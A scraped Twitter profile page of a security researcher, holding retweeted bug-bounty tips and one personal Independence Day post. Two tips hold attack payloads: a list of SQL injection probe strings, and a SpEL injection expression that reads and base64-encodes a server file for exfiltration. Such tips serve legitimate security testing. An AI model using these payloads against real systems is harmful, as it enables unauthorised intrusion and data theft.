spidersec (@spidersec) 's Twitter Profile
spidersec

@spidersec

- Suvadip Kar

ID: 811914616901169156

linkhttps://spidersec.ninja calendar_today22-12-2016 12:41:44

329 Tweet

5,5K Followers

85 Following

Sapra (@0xsapra) 's Twitter Profile Photo

This is how I found sql-Injection 100% of the time For site.com/?q=HERE /?q=1 /?q=1' /?q=1" /?q=[1] /?q[]=1 /?q=1` /?q=1\ /?q=1/*'*/ /?q=1/*!1111'*/ /?q=1'||'asd'||' <== concat string /?q=1' or '1'='1 /?q=1 or 1=1 /?q='or''=' #bugbounty #BugBountyTips

Peter M (@pmnh_) 's Twitter Profile Photo

If you can get SpEL injection but can't get RCE, try exfiltrating a file with B64 encoding: T(java.util.Base64).getEncoder().encodeToString(T(org.apache.commons.io.FileUtils).readFileToString('/proc/self/cmdline').getBytes())

spidersec (@spidersec) 's Twitter Profile Photo

My grandfather, The late Dhananjay kar spent 14 years of his life in cellular Jail, infamously known as kalapani. The freedom of india didn't came so easily, we "the new generation" will never understand the struggle behind it. #IndependenceDay #IndiaAt75 #स्वतंत्रतादिवस

My grandfather, The late Dhananjay kar spent 14 years of his life in cellular Jail, infamously known as kalapani.

The freedom of india didn't came so easily, we "the new generation" will never understand the struggle behind it.

#IndependenceDay #IndiaAt75 #स्वतंत्रतादिवस
Thanh Nguyen (@redragonvn) 's Twitter Profile Photo

Our Pre-Auth RCE exploit for Atlassian Confluence (CVE-2021–26084) was leaked after reporting it to VMware. They have refused to admit the leak and ignored our emails. tradahacking.vn/atlassian-conf…

payloadartist (@payloadartist) 's Twitter Profile Photo

⚙️ A lesser known tool, Osmedeus is the closest to Nuclei, that comes with an amazing web UI. You can use custom YAML workflows and vulnerability signatures just like Nuclei. 🔗 github.com/j3ssie/Osmedeus #bugbounty #bugbountytips #infosec #cybersecurity #Pentesting

⚙️ A lesser known tool, Osmedeus is the closest to Nuclei, that comes with an amazing web UI. You can use custom YAML workflows and vulnerability signatures just like Nuclei.

🔗 github.com/j3ssie/Osmedeus

#bugbounty #bugbountytips #infosec #cybersecurity #Pentesting